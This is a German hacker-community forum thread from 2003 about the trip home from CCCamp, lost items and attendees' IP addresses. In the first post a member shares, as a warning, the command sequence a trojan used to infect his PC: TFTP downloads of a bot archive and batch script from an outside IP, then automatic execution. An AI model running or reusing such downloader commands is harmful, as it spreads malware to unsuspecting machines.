Life after CCCamp ;)

Hier kann alles andere besprochen werden. Software, Treffen, oder Projekte wie Kippenlights, GroggyClock, usw.
Antworten
Xyphro
BlinkenNewbie
BlinkenNewbie
Beiträge: 6
Registriert: Mo Jul 14, 2003 9:13 pm
Wohnort: Dinslaken
Kontaktdaten:

Life after CCCamp ;)

Beitrag von Xyphro » Di Aug 12, 2003 10:42 am

Hallo zusammen!

Die Rückfahrt war echt heftig...

Erst sind wir auf der A10 geblitzt worden (20km/h drüber) und standen dann auf der A2 in einem Stau. Ein Auto brannte auf der A2 bei Magdeburg... 3 Stunden tat sich garnichts, dann sollten alle Autos auf der Bahn wenden und die nächste Ausfahrt runterfahren. Insgesamt 6 1/2 Stunden hat es gedauert, bis wir wieder auf der A2 waren um zu bemerken, dass die Sperrung längst wieder weg war...
Um 2:30 waren wir dann wieder Zuhause ;)

Weiss von euch jemand zufällig, wer die IP 81.161.134.174 hatte? Habe da einen netten Trojaner her, der sich von dieser IP installiert und wild in der Gegend rumgefunkt hat.

So hat sich das Teil installiert:
-------------8<-------------8<-------------8<-------------8<-------------
mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
TFTP -i 81.161.134.174 GET bot.rar
TFTP -i 81.161.134.174 GET unrar.bat
TFTP -i 81.161.134.174 GET unrar.exe
start unrar.bat
exit
-------------8<-------------8<-------------8<-------------8<-------------

Im Taskmanager war das ganze als winole.exe und sfind.exe sichtbar.

Nur zur Info, falls sich noch jemand anderes das Teil "eingefangen" hat.

viele Grüsse,

Kai

cavac

Re: Life after CCCamp ;)

Beitrag von cavac » Di Aug 12, 2003 1:39 pm

Xyphro hat geschrieben:Hallo zusammen!

Die Rückfahrt war echt heftig...
Wem sagst du das? Vor uns hatte sich auf der A9 ein LKW mal schnell quer auf der Strasse schlafengelegt. 2 Stunden warten, 20-25 Baustellen ind Deutschland, und ~80 km noch nicht fertig gebastelte Autubahn in Österreich...
Xyphro hat geschrieben: Weiss von euch jemand zufällig, wer die IP 81.161.134.174 hatte? Habe da einen netten Trojaner her, der sich von dieser IP installiert und wild in der Gegend rumgefunkt hat.
Kai
War auf jeden Fall einer aus der BlinkenArea. Da hatte ich einen Fix-Peer drauf. 1stein hatte Linux, die Kollegen im Zelt nebenan einen DynPeer. Wäre eigentlich nur das Haus oder die BlinkenBoardler, die in Frage kommen. (174 war zwar meiner Einschätzung nach deiner, aber der Virus wird sich wohl nicht von deinem Rechner aus wieder auf deinen installiert haben).

LLAP & LG
Rene

cavac

Email-Adressen

Beitrag von cavac » Di Aug 12, 2003 1:45 pm

Bitte schickt mit doch ein kurzes Mail an
"cavac AT grumpfzotz.org"
damit ich eure Mailadressen habe

Benutzeravatar
stefan
Blinkenizer
Blinkenizer
Beiträge: 234
Registriert: Mi Okt 09, 2002 9:45 pm
Wohnort: Aachen
Kontaktdaten:

Beitrag von stefan » Di Aug 12, 2003 2:46 pm

Ohje, da haben wir ja richtig Glück mit der Rückahrt gehabt... Lief' eigentlich alles glatt...

Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy. Ich habe dafür einen Seitenschneider mit roten Griffen, einen roten Schlitz-Schraubendreher mit gelbem Muster auf dem Griff und einen roten STADA-Kugelschreiber mitgenommen, da diese Sachen nachher noch irgendwie da waren. Das können wir dann ja beim Kongress zurücktauschen.

folgende IPs konnte ich (aus meinen Logfiles) zuordnen:

1stein's Notebook: 81.161.150.32, 81.161.150.75, 81.161.189.187
BLINKENmini-Rechner: 81.161.134.172
cavac's Rechner: 81.161.135.147
BastelWastel: 81.161.135.160
versuchte Exploits auf meinen ssh-port: 81.161.135.227, 81.161.134.237, 81.161.134.57, 81.161.148.185

Mehr Infos habe ich leider nicht.

Gruß,
1stein

Poledra

Beitrag von Poledra » Di Aug 12, 2003 7:23 pm

Hmm ich habe bisher nichts gefunden, dass nicht mir gehört ;) Sorry ;( Sollte ich noch etwas finden melde ich mich. Hätte ich das Handy gehabt wäre es mir schon aufgefallen, ein Messer auch!

Ich hoffe Ihr findet es noch!

Liebe Grüße Ina

PS: Kai hat auch nichts gefunden und meint, dass er auch seine Seitenschneider habe ...

cavac

Auch hier "fundsachen"

Beitrag von cavac » Mi Aug 13, 2003 6:37 pm

[quote="1stein"]Ohje, da haben wir ja richtig Glück mit der Rückahrt gehabt... Lief' eigentlich alles glatt...

Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy.

Ich hätte hier Kai's Feuerzeug zum anbieten, ist aber schon leergeraucht :-)

Ansonsten schauts bei mir ziemlich OK aus; falls jemand ein Kaltgeräte-Stromkabel o.ä. vermisst: Ich hatte eine Menge mitgenommen und eine Menge zurückgebracht, jedoch nicht gezählt...

LLAP & LG
Rene

Antworten